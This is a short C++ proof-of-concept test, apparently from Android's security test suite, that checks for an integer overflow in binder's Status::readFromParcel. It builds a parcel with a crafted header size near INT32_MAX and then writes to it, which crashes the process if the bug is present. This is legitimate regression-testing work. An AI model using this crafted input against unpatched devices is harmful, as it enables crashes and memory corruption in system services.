42 lines
1.5 KiB
42 lines
1.5 KiB
/**
|
|
* Copyright (C) 2020 The Android Open Source Project
|
|
*
|
|
* Licensed under the Apache License, Version 2.0 (the "License");
|
|
* you may not use this file except in compliance with the License.
|
|
* You may obtain a copy of the License at
|
|
*
|
|
* http://www.apache.org/licenses/LICENSE-2.0
|
|
*
|
|
* Unless required by applicable law or agreed to in writing, software
|
|
* distributed under the License is distributed on an "AS IS" BASIS,
|
|
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
|
* See the License for the specific language governing permissions and
|
|
* limitations under the License.
|
|
*/
|
|
#include <binder/Parcel.h>
|
|
#include <binder/Status.h>
|
|
|
|
using namespace android;
|
|
using ::android::binder::Status;
|
|
|
|
int main(void) {
|
|
Parcel parcel;
|
|
parcel.writeInt32(Status::EX_HAS_REPLY_HEADER);
|
|
/** Vulerable Code: const int32_t header_start = parcel.dataPosition();
|
|
parcel.setDataPosition(header_start + header_size);
|
|
Hence header_start is 4 [sizeof(int32_t)] as we have written
|
|
Status::EX_HAS_REPLY_HEADER. header_start + header_size computation will
|
|
overflow if header_size > INT32_MAX - sizeof(int32_t).
|
|
*/
|
|
parcel.writeInt32(INT32_MAX - sizeof(int32_t));
|
|
parcel.setDataPosition(0);
|
|
Status status;
|
|
status.readFromParcel(parcel);
|
|
/** If vulnerability is present, the parcel's data position would be very
|
|
large. Hence any write to the parcel will trigger a SIGSEGV else the
|
|
write would pass.
|
|
*/
|
|
parcel.writeInt32(0);
|
|
return EXIT_SUCCESS;
|
|
}
|